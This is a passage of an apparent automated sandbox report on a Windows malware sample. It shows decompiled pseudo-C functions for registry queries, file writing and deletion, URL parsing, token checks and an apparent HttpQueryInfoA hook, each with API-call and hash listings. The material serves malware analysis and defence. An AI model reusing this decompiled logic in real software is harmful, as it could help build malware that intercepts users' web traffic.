    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Free$Alloc
    • String ID: Content-Length$gfff
    • API String ID: 3901518246-3327608114
    • Opcode ID: f5c5019c0852d1294a8faa2dca426f39ff807579cd43706ad30c50d36291e235
    • Instruction ID: 7fb144fba8059f8bd18c5d1decb182e72817b58b3552d0a799f09638c7f398b1
    • Opcode Fuzzy Hash: f5c5019c0852d1294a8faa2dca426f39ff807579cd43706ad30c50d36291e235
    • Instruction Fuzzy Hash: F94132766082055FD304DB2ADC40EAB37A8EBC9314F044A3EF944D7342EA35ED0A86A2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 64%
    			E0040D620(void* __eax, void* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				intOrPtr _v14;
    				void* _v356;
    				char _v492;
    				intOrPtr _v504;
    				void* _v520;
    				char _v521;
    				void* _v524;
    				void* _v533;
    				void* _v536;
    				void* __edi;
    				void* __esi;
    				signed char _t42;
    				intOrPtr _t44;
    				intOrPtr* _t49;
    				long _t64;
    				void* _t69;
    				void* _t72;
    				void* _t74;
    				intOrPtr _t79;
    				void* _t90;
    				signed int _t99;
    				void* _t101;
    
    				_t101 = (_t99 & 0xfffffff8) - 0x20c;
    				_t72 = __eax;
    				_t42 = 0;
    				_v521 = 0;
    				_v520 = 0;
    				if(__eax >= 0xa00000) {
    					L20:
    					return _t42;
    				}
    				E0040C730(__edx,  &_v520, 0x1e);
    				if(0 == 0) {
    					L19:
    					_t42 = _v521;
    					goto L20;
    				}
    				_t90 = _v520;
    				_t44 =  *((intOrPtr*)(_t90 + 0x14));
    				_t75 = _t44 + 0x14;
    				if(_t44 + 0x14 <= _t44) {
    					L17:
    					if(_t90 != 0) {
    						HeapFree( *0x42e6d4, 0, _t90);
    					}
    					goto L19;
    				}
    				E00410740(_t75,  &_v520);
    				if(0 == 0) {
    					L16:
    					_t90 = _v520;
    					goto L17;
    				}
    				_t90 = _v520;
    				 *((intOrPtr*)( *((intOrPtr*)(_t90 + 0x14)) + _t90 + 8)) = 4;
    				_t49 = E00410820( *((intOrPtr*)(_t90 + 0x14)) + _t90 + 0x10,  &_a4, 4);
    				_t96 =  *((intOrPtr*)(_t90 + 0x14));
    				_t79 =  *((intOrPtr*)(_t49 + 8)) +  *((intOrPtr*)(_t90 + 0x14)) + 0x10;
    				if(_t79 > 0xa00000) {
    					goto L17;
    				}
    				 *((intOrPtr*)(_t49 + 0xc)) = 4;
    				_t84 = _a16;
    				 *_t49 = 0x2722;
    				 *((intOrPtr*)(_t49 + 4)) = 0x20000;
    				 *((intOrPtr*)(_t90 + 0x1c)) =  *((intOrPtr*)(_t90 + 0x1c)) + 1;
    				 *((intOrPtr*)(_t90 + 0x14)) = _t79;
    				E00418930( &_v520, 0x2723, 0x20000, _a16, _t72);
    				if(0 == 0) {
    					goto L16;
    				}
    				_t52 = _a8;
    				if(_a8 == 0) {
    					L8:
    					_t53 = _a12;
    					if(_a12 == 0) {
    						L10:
    						_t74 = E0041CDD0(_t111, 0x8793aef2, 2);
    						if(_t74 == 0) {
    							goto L16;
    						} else {
    							E0041D1B0( &_v492);
    							E0040C490(0, _t96, 1);
    							_v504 = _v14;
    							if(E00419110(0x42d4f8,  &_v520) == 0) {
    								_t90 = _v520;
    								ReleaseMutex(_t74);
    								CloseHandle(_t74);
    							} else {
    								_t64 = E00418D30( &_v520, 0, _t101 + 0xbc);
    								_t90 =  *(_t101 + 0x14);
    								if(_t64 != 0) {
    									 *((char*)(_t101 + 0x13)) = E004192B0(_t101 + 0x20, _t90, _t64);
    								}
    								E00419280(_t101 + 0x18);
    								ReleaseMutex(_t74);
    								CloseHandle(_t74);
    							}
    							goto L17;
    						}
    					}
    					_t69 = E004189F0(_t53,  &_v520,  &_v520, 0x2718);
    					_t111 = _t69;
    					if(_t69 == 0) {
    						goto L16;
    					}
    					goto L10;
    				}
    				E004189F0(_t52, _t84,  &_v520, 0x2717);
    				if(0 == 0) {
    					goto L16;
    				}
    				goto L8;
    			}

    APIs
      • Part of subcall function 0040C730: HeapAlloc.KERNEL32(?,00000008,00000034), ref: 0040C74E
    • HeapFree.KERNEL32(?,00000000,00000000,0000001E), ref: 0040D7D7
      • Part of subcall function 00410740: HeapFree.KERNEL32(?,?,?,0041895B,00000000,00000000,00000000,00000000,0040C6FF,-00002720,00020000,00000000,00000000,?,00000001), ref: 00410752
    • ReleaseMutex.KERNEL32(00000000,?,00000000,?,?,00000001,8793AEF2,00000002,00002723,00020000,?,?,00000000,?,00000004,0000001E), ref: 0040D7A2
    • CloseHandle.KERNEL32(00000000), ref: 0040D7A9
      • Part of subcall function 004189F0: HeapFree.KERNEL32(?,00000000,00000000,?,00020000,00000000,00000000,0000FDE9,00000001,?,00000000,00000001), ref: 00418A5C
    • ReleaseMutex.KERNEL32(00000000,?,00000001,8793AEF2,00000002,00002723,00020000,?,?,00000000,?,00000004,0000001E), ref: 0040D7B6
    • CloseHandle.KERNEL32(00000000), ref: 0040D7BD
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Free$CloseHandleMutexRelease$Alloc
    • String ID:
    • API String ID: 2428026407-0
    • Opcode ID: 7a89f029836b77a4e8a4b039ebd3c50b793626a1571464e4a39b2e9ba6c60d1e
    • Instruction ID: 1ec435df002ac43dc60ac7b5a76e97f5436ffd38f1a62295c30a9573fc243218
    • Opcode Fuzzy Hash: 7a89f029836b77a4e8a4b039ebd3c50b793626a1571464e4a39b2e9ba6c60d1e
    • Instruction Fuzzy Hash: CF41D0715043029FC710DF65E984EABB7E8AF84704F00492EB945772D2DB38EC49CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E0040EF30(void* __edi, void* __ebp, void* __eflags, void* _a4, WCHAR* _a8, char _a12) {
    				void* _v4;
    				long _v8;
    				void* _v12;
    				void* __esi;
    				void* _t20;
    				void* _t31;
    				void* _t35;
    				void* _t36;
    				void* _t43;
    				void* _t49;
    				void* _t50;
    
    				_t35 = 0;
    				if(E00418040(0,  *0x42e954,  &_v12) == 0) {
    					return 0;
    				} else {
    					_push(__edi);
    					if(_a4 != 0) {
    						_t43 = _v12;
    						_t52 = _v8;
    						if(_v8 != 0) {
    							_t49 = HeapAlloc( *0x42e6d4, 0,  &_a4);
    							if(_t49 != 0) {
    								E00410820(_t49, _t43, _t52);
    							}
    						} else {
    							_t49 = 0;
    						}
    						if(_t43 != 0) {
    							VirtualFree(_t43, 0, 0x8000);
    						}
    						_t20 = _v4;
    						if(_t20 != 0) {
    							CloseHandle(_t20);
    						}
    						if(_t49 != 0) {
    							if(E0041D5A0(_t43, _t49, _t52, _a4) != 0) {
    								_t35 = E0040EE70(_a8, _t49, _t52, _a12);
    							}
    							HeapFree( *0x42e6d4, 0, _t49);
    						}
    						return _t35;
    					} else {
    						_t50 = _v12;
    						_t36 = E0040EE70(_a8, _t50, _v8, _a12);
    						if(_t50 != 0) {
    							VirtualFree(_t50, 0, 0x8000);
    						}
    						_t31 = _v4;
    						if(_t31 != 0) {
    							CloseHandle(_t31);
    						}
    						return _t36;
    					}
    				}
    			}

    APIs
      • Part of subcall function 00418040: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,0041D962,?,?,00000000), ref: 00418061
      • Part of subcall function 00418040: GetFileSizeEx.KERNEL32(00000000,00000000,?,00000000,00000003,00000000,00000000,?,0041D962,?,?,00000000), ref: 00418075
    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?), ref: 0040EF7E
    • CloseHandle.KERNEL32(?,?,?,?), ref: 0040EF8D
    • HeapAlloc.KERNEL32(?,00000000,?), ref: 0040EFBB
    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040EFDB
    • CloseHandle.KERNEL32(00000000), ref: 0040EFEA
    • HeapFree.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0040F01F
      • Part of subcall function 0040EE70: SetFileAttributesW.KERNEL32(?,00000020), ref: 0040EE84
      • Part of subcall function 0040EE70: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0040EE9B
      • Part of subcall function 0040EE70: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040EEC2
      • Part of subcall function 0040EE70: CloseHandle.KERNEL32(00000000), ref: 0040EECF
      • Part of subcall function 0040EE70: SetFileAttributesW.KERNEL32(?,00000080), ref: 0040EEE0
      • Part of subcall function 0040EE70: DeleteFileW.KERNEL32(?), ref: 0040EEE3
      • Part of subcall function 0040EE70: Sleep.KERNEL32(-00001388), ref: 0040EF08
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: File$CloseFreeHandle$AttributesCreateHeapVirtual$AllocDeleteSizeSleepWrite
    • String ID:
    • API String ID: 2978562043-0
    • Opcode ID: 9cbbdf3198630f75f4a3e8660db6f861a18dd69290e957e1b24b5a5c89266cf1
    • Instruction ID: 751bdc1b12cec48ed9f16c833f76b647033e23c2bd8c8b87e90c97417d88d833
    • Opcode Fuzzy Hash: 9cbbdf3198630f75f4a3e8660db6f861a18dd69290e957e1b24b5a5c89266cf1
    • Instruction Fuzzy Hash: 6431D8326452117BC220DB12ED04FAB779CEB85714F14093AFD40B7351C639ED09C7AA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00416420(void* __eax, int _a4, short* _a8, void* _a12) {
    				int _v4;
    				void* __esi;
    				short* _t21;
    				signed int _t33;
    				unsigned int _t34;
    				signed int _t36;
    				WCHAR* _t37;
    				void* _t47;
    				WCHAR* _t49;
    				long _t50;
    
    				_t50 = _a12;
    				_t49 = _t37;
    				_v4 = _t50 + _t50;
    				_a12 = __eax;
    				_t34 = _t33 | 0xffffffff;
    				_t21 = RegOpenKeyExW(__eax, _a4, 0, 1,  &_a12);
    				if(_t21 == 0) {
    					RegQueryValueExW(_a12, _a8, 0,  &_a4, _t49,  &_v4);
    					_t34 =  ==  ? _v4 : _t34;
    					_t21 = RegCloseKey(_a12);
    				}
    				if(_t34 == 0xffffffff || (_t34 & 0x00000001) != 0) {
    					L20:
    					return _t21 | 0xffffffff;
    				} else {
    					_t21 = _a4;
    					if(_t21 == 1 || _t21 == 2) {
    						if(_t34 != 0) {
    							_t36 = (_t34 >> 1) - 1;
    							if(_t49[_t36] == 0) {
    								L11:
    								if(_t36 > 2 && _t21 == 2) {
    									_t47 = E00410D20(_t49);
    									if(_t47 == 0 || ExpandEnvironmentStringsW(_t47, _t49, _t50) == 0) {
    										_t36 = _t36 | 0xffffffff;
    									}
    									if(_t47 != 0) {
    										HeapFree( *0x42e6d4, 0, _t47);
    									}
    								}
    								return _t36;
    							} else {
    								_t36 = _t36 + 1;
    								if(_t50 <= _t36) {
    									goto L20;
    								} else {
    									_t49[_t36] = 0;
    									goto L11;
    								}
    							}
    						} else {
    							 *_t49 = 0;
    							return _t34;
    						}
    					} else {
    						goto L20;
    					}
    				}
    			}

    APIs
    • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,00000000,00000000,?,004106E6,?,?,00000104,?,00000000), ref: 00416448
    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00416469
    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0041647B
    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 004164DB
    • HeapFree.KERNEL32(?,00000000,00000000,?,?,00000000), ref: 004164F5
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CloseEnvironmentExpandFreeHeapOpenQueryStringsValue
    • String ID:
    • API String ID: 19685416-0
    • Opcode ID: 80c49f4260ad4102f3e1327bc1c7fa865722f8300ce82cbbbb9a5975e2239b81
    • Instruction ID: 6d6087f00cdb0f69a1774fa8b175932884c132cc203557ebf9c7bcbe61c88e50
    • Opcode Fuzzy Hash: 80c49f4260ad4102f3e1327bc1c7fa865722f8300ce82cbbbb9a5975e2239b81
    • Instruction Fuzzy Hash: F531D6722043016ED324CF68EC84FABB3A9EF94724F214A2EF551C22A0E775E881C359
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00417560(char* __edx) {
    				intOrPtr _v12;
    				void* _v16;
    				void* _v20;
    				intOrPtr _v24;
    				intOrPtr _v44;
    				void* __esi;
    				void* _t16;
    				void* _t19;
    				void* _t27;
    				void _t28;
    				void* _t33;
    				intOrPtr _t34;
    				void* _t35;
    				void* _t36;
    
    				_t34 = 0;
    				_v24 = 0;
    				if(E004173A0( &_v20, __edx) == 0) {
    					L20:
    					return _t34;
    				} else {
    					_t36 = _v16;
    					 *((char*)(_v12 + _t36)) = 0;
    					_t33 = _t36;
    					do {
    						_t28 =  *_t33;
    						_t33 = _t33 + 1;
    					} while (_t28 != 0);
    					while(1) {
    						_t33 = _t33 - 1;
    						if(_t33 == _t36) {
    							break;
    						}
    						if( *_t33 != 0x2f) {
    							continue;
    						}
    						L7:
    						if( *(_t33 + 1) == 0) {
    							L16:
    							_t16 = _v20;
    							if(_t16 != 0) {
    								HeapFree( *0x42e6d4, 0, _t16);
    							}
    							if(_t36 != 0) {
    								HeapFree( *0x42e6d4, 0, _t36);
    							}
    							goto L20;
    						}
    						_t27 = 0;
    						if( *_t33 == 0) {
    							L10:
    							_t8 = _t27 + 1; // 0x2
    							_t19 = _t8;
    							if(_t19 != 0) {
    								_t35 = HeapAlloc( *0x42e6d4, 8, _t19 + 4);
    								if(_t35 != 0) {
    									E00410820(_t35, _t33, _t27);
    									if(UrlUnescapeA(_t35, 0, 0, 0x100000) == 0) {
    										_v44 = E00410AA0(_t35, 0xfde9, 0xffffffff);
    									}
    									HeapFree( *0x42e6d4, 0, _t35);
    								}
    								_t34 = _v24;
    							}
    							goto L16;
    						} else {
    							goto L9;
    						}
    						do {
    							L9:
    							_t27 = _t27 + 1;
    						} while ( *((char*)(_t27 + _t33)) != 0);
    						goto L10;
    					}
    					if( *_t33 != 0x2f) {
    						goto L16;
    					}
    					goto L7;
    				}
    			}

    APIs
      • Part of subcall function 004173A0: InternetCrackUrlA.WININET(?,00000000,00000000), ref: 004173D7
    • HeapAlloc.KERNEL32(?,00000008,-00000003), ref: 004175CF
    • UrlUnescapeA.SHLWAPI(00000000,00000000,00000000,00100000,00000000,?,00000000), ref: 004175ED
    • HeapFree.KERNEL32(?,00000000,00000000), ref: 00417610
    • HeapFree.KERNEL32(?,00000000,?), ref: 0041762C
    • HeapFree.KERNEL32(?,00000000,?), ref: 00417640
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Heap$Free$AllocCrackInternetUnescape
    • String ID:
    • API String ID: 3742444136-0
    • Opcode ID: 2e225a74d13c428d7b25b73b4921e3deb01bc62d105f78218cdc73ef77973636
    • Instruction ID: 8b2c4135e85eb0d66e268d6d1fc0aa0330de5d8081533fe2f3ff8e2ac169aef2
    • Opcode Fuzzy Hash: 2e225a74d13c428d7b25b73b4921e3deb01bc62d105f78218cdc73ef77973636
    • Instruction Fuzzy Hash: CA2126746083426BD7309F25DC44FAB7BB8AB95760F54042AF940A7392D778DC81C7AE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00425CF0(signed int __eax, void* _a4) {
    				void* _t10;
    				void* _t15;
    				void* _t16;
    				void* _t17;
    				void* _t18;
    				signed int _t24;
    				void** _t31;
    				void* _t33;
    
    				_t10 = __eax;
    				_t33 = _a4;
    				_t24 = __eax;
    				if(__eax != 0) {
    					_t31 = _t33 + 8 + (__eax * 8 - __eax) * 4;
    					do {
    						_t15 =  *(_t31 - 0x20);
    						_t31 = _t31 - 0x1c;
    						_t24 = _t24 - 1;
    						if(_t15 != 0) {
    							HeapFree( *0x42e6d4, 0, _t15);
    						}
    						_t16 =  *_t31;
    						if(_t16 != 0) {
    							HeapFree( *0x42e6d4, 0, _t16);
    						}
    						_t17 = _t31[1];
    						if(_t17 != 0) {
    							HeapFree( *0x42e6d4, 0, _t17);
    						}
    						_t18 = _t31[2];
    						if(_t18 != 0) {
    							HeapFree( *0x42e6d4, 0, _t18);
    						}
    						_t10 = _t31[3];
    						if(_t10 != 0) {
    							_t10 = HeapFree( *0x42e6d4, 0, _t10);
    						}
    					} while (_t24 != 0);
    				}
    				if(_t33 != 0) {
    					return HeapFree( *0x42e6d4, 0, _t33);
    				}
    				return _t10;
    			}












    APIs
    • HeapFree.KERNEL32(?,00000000,?,00000000,00000000,?,00000000,0040884D,00000000,?,?,?), ref: 00425D26
    • HeapFree.KERNEL32(?,00000000,?,00000000,00000000,?,00000000,0040884D,00000000,?,?,?), ref: 00425D38
    • HeapFree.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,0040884D,00000000,?,?,?), ref: 00425D4A
    • HeapFree.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,0040884D,00000000,?,?,?), ref: 00425D5D
    • HeapFree.KERNEL32(?,00000000,?,00000000,00000000,?,00000000,0040884D,00000000,?,?,?), ref: 00425D70
    • HeapFree.KERNEL32(?,00000000,?,00000000,?,00000000,0040884D,00000000,?,?,?), ref: 00425D84
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: FreeHeap
    • String ID:
    • API String ID: 3298025750-0
    • Opcode ID: 49678c1f73140d94d630d62a30f4ee9f60220b3c6f3a7be05368c36227b1f685
    • Instruction ID: e55e8997f0d425893a32fcdebfb004b6fda2ca774595fddcd426d56432ce9166
    • Opcode Fuzzy Hash: 49678c1f73140d94d630d62a30f4ee9f60220b3c6f3a7be05368c36227b1f685
    • Instruction Fuzzy Hash: BF11E2713107156BE624DFAAFD84F27B39CEB64750FD18539AA00D7660DA74EC018B68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00416680(short* __ebx, int* __edi, void** _a4, void** _a8) {
    				int* _v4;
    				int _v8;
    				int _t18;
    				void* _t19;
    				void* _t38;
    
    				_v4 = 0xffffffff;
    				_v8 = 0;
    				if(RegQueryValueExW( *_a4, __ebx, 0, __edi, 0,  &_v8) == 0) {
    					_t18 = _v8;
    					if(_t18 != 0) {
    						_t19 = _t18 + 4;
    						if(_t19 != 0) {
    							_t38 = HeapAlloc( *0x42e6d4, 8, _t19 + 4);
    							if(_t38 != 0) {
    								if(RegQueryValueExW( *_a4, __ebx, 0, __edi, _t38,  &_v8) != 0) {
    									HeapFree( *0x42e6d4, 0, _t38);
    								} else {
    									 *_a8 = _t38;
    									_v4 = _v8;
    								}
    							}
    						}
    					} else {
    						_v4 = 0;
    					}
    				}
    				RegCloseKey( *_a4);
    				return _v4;
    			}









    APIs
    • RegQueryValueExW.ADVAPI32 ref: 004166A9
    • HeapAlloc.KERNEL32(?,00000008,?), ref: 004166D0
    • RegQueryValueExW.ADVAPI32(00000000,0042E704,00000000,80000001,00000000,?), ref: 004166ED
    • RegCloseKey.ADVAPI32 ref: 00416719
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: QueryValue$AllocCloseHeap
    • String ID:
    • API String ID: 2375073885-0
    • Opcode ID: 1d8648a001cd47a19181686dbc7cb078f1c5a34786bbb23267eeb518dfd8a84d
    • Instruction ID: 4ebefba520f494b2b0d91e2f6570a26fe88df0a4ec3abdf12de87c73d0760690
    • Opcode Fuzzy Hash: 1d8648a001cd47a19181686dbc7cb078f1c5a34786bbb23267eeb518dfd8a84d
    • Instruction Fuzzy Hash: 2B117FB5604311ABC220DF55DC44E5BBBA8EB99764F10852AF8A4D7350D734EC80CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00413A40(void* __esi) {
    				void* _t13;
    				void* _t14;
    				void* _t15;
    				void* _t16;
    				void* _t17;
    				void* _t18;
    				void* _t32;
    
    				_t32 = __esi;
    				_t13 =  *(__esi + 0x5c);
    				if(_t13 != 0) {
    					HeapFree( *0x42e6d4, 0, _t13);
    				}
    				_t14 =  *(_t32 + 0x58);
    				 *((intOrPtr*)(_t32 + 0x5c)) = 0;
    				if(_t14 != 0) {
    					HeapFree( *0x42e6d4, 0, _t14);
    				}
    				_t15 =  *(_t32 + 0x54);
    				 *(_t32 + 0x58) = 0;
    				if(_t15 != 0) {
    					HeapFree( *0x42e6d4, 0, _t15);
    				}
    				_t16 =  *(_t32 + 0x50);
    				 *(_t32 + 0x54) = 0;
    				if(_t16 != 0) {
    					HeapFree( *0x42e6d4, 0, _t16);
    				}
    				_t17 =  *(_t32 + 0x4c);
    				 *(_t32 + 0x50) = 0;
    				if(_t17 != 0) {
    					HeapFree( *0x42e6d4, 0, _t17);
    				}
    				_t18 =  *(_t32 + 0x48);
    				 *(_t32 + 0x4c) = 0;
    				if(_t18 != 0) {
    					_t18 = HeapFree( *0x42e6d4, 0, _t18);
    				}
    				 *(_t32 + 0x48) = 0;
    				return _t18;
    			}











    APIs
    • HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00414976,0000004C), ref: 00413A59
    • HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00414976,0000004C), ref: 00413A6E
    • HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00414976,0000004C), ref: 00413A83
    • HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00414976,0000004C), ref: 00413A97
    • HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00414976,0000004C), ref: 00413AAC
    • HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00414976,0000004C), ref: 00413AC1
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: FreeHeap
    • String ID:
    • API String ID: 3298025750-0
    • Opcode ID: 84513611c1a9449b49a2b9fc2d5e8fc9891ecc95033e354dff38ada5948733e6
    • Instruction ID: d9791ccf93b3e2a4d092388a74f35a5038ba703d4976d5e208127d939e7af564
    • Opcode Fuzzy Hash: 84513611c1a9449b49a2b9fc2d5e8fc9891ecc95033e354dff38ada5948733e6
    • Instruction Fuzzy Hash: B6119AB5600754AFD724DFAADDC0C27B3ECEBA4249390483EE682C3A20C674EC458B24
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040C1A0(void* _a4, long _a8, void* _a12, DWORD* _a16, DWORD* _a20) {
    				signed int _t23;
    				void* _t24;
    				intOrPtr* _t26;
    				signed int _t27;
    				intOrPtr _t29;
    				intOrPtr* _t32;
    				void* _t35;
    
    				if(WaitForSingleObject( *0x42edbc, 0) == 0) {
    					_t35 = _a4;
    					L14:
    					return HttpQueryInfoA(_t35, _a8, _a12, _a16, _a20);
    				}
    				EnterCriticalSection(0x42d3ec);
    				_t35 = _a4;
    				if(_t35 == 0) {
    					L12:
    					LeaveCriticalSection(0x42d3ec);
    					goto L14;
    				}
    				_t29 =  *0x42d408; // 0x0
    				_t23 = 0;
    				if(_t29 == 0) {
    					goto L12;
    				}
    				_t32 =  *0x42d404; // 0x0
    				_t26 = _t32;
    				while( *_t26 != _t35) {
    					_t23 = _t23 + 1;
    					_t26 = _t26 + 0x24;
    					if(_t23 < _t29) {
    						continue;
    					}
    					LeaveCriticalSection(0x42d3ec);
    					goto L14;
    				}
    				if(_t23 != 0xffffffff) {
    					_t27 = _t23 + _t23 * 8;
    					_t24 = _t32 + _t27 * 4;
    					if( *((intOrPtr*)(_t32 + 0x10 + _t27 * 4)) == 1 && ( *( *(_t24 + 0xc)) & 0x00000003) != 0) {
    						_t35 =  *(_t24 + 0x20);
    					}
    				}
    				goto L12;
    			}











    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040C1A9
    • EnterCriticalSection.KERNEL32(0042D3EC), ref: 0040C1B8
    • LeaveCriticalSection.KERNEL32(0042D3EC), ref: 0040C1F2
    • LeaveCriticalSection.KERNEL32(0042D3EC), ref: 0040C21D
    • HttpQueryInfoA.WININET(?,?,?,?,?), ref: 0040C23E
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$Leave$EnterHttpInfoObjectQuerySingleWait
    • String ID:
    • API String ID: 1835780783-0
    • Opcode ID: f3c8711330da3ff3d6dfb127b4fcc98089e90065c21655d5ec3ab518b915566f
    • Instruction ID: 1f2fdd81bb878d641edc389b1b94d291beade0a509c9ab471e1fdea1d043c2a5
    • Opcode Fuzzy Hash: f3c8711330da3ff3d6dfb127b4fcc98089e90065c21655d5ec3ab518b915566f
    • Instruction Fuzzy Hash: 4E119330A00211DBC715DB94E884E6B77A4FBC5750B5947AEF801F72E0C734AC42CA59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00415650(void* __edi) {
    				long _v4;
    				long _v8;
    				long _t9;
    				void* _t21;
    
    				if(GetTokenInformation(__edi, 1, 0, 0,  &_v4) != 0 || GetLastError() != 0x7a) {
    					L7:
    					return 0;
    				} else {
    					_t9 = _v8;
    					if(_t9 == 0) {
    						goto L7;
    					} else {
    						_t21 = HeapAlloc( *0x42e6d4, 8, _t9 + 4);
    						if(_t21 == 0) {
    							goto L7;
    						} else {
    							if(GetTokenInformation(__edi, 1, _t21, _v8,  &_v8) == 0) {
    								HeapFree( *0x42e6d4, 0, _t21);
    								goto L7;
    							} else {
    								return _t21;
    							}
    						}
    					}
    				}
    			}








    APIs
    • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000,0042E908,?,004128E2,?,?,00000008,00000000,00000000,?,00000000), ref: 00415665
    • GetLastError.KERNEL32(?,004128E2,?,?,00000008,00000000,00000000,?,00000000), ref: 0041566B
    • HeapAlloc.KERNEL32(?,00000008,-00000004,?,004128E2,?,?,00000008,00000000,00000000,?,00000000), ref: 0041568B
    • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,004128E2,?,?,00000008,00000000,00000000,?,00000000), ref: 004156A5
    • HeapFree.KERNEL32(?,00000000,00000000,?,004128E2,?,?,00000008,00000000,00000000,?,00000000), ref: 004156BB
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: HeapInformationToken$AllocErrorFreeLast
    • String ID:
    • API String ID: 647283058-0
    • Opcode ID: 7506e1626c13625625b78eff052a29cf44157c8570421bd7b7b6121db458cfd6
    • Instruction ID: 7982cb950c10b9e9f3f7904e51c632f1a7264e0a47349f5811c68f4df8127647
    • Opcode Fuzzy Hash: 7506e1626c13625625b78eff052a29cf44157c8570421bd7b7b6121db458cfd6
    • Instruction Fuzzy Hash: FC018671301712FBE6249755ECC4FE777ACEB84750F500429FA05E62A0D674EC4087A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041A270(void* __ecx, struct HWINSTA__* _a4) {
    				void* __edi;
    				struct HWINSTA__* _t3;
    				int _t5;
    				void* _t12;
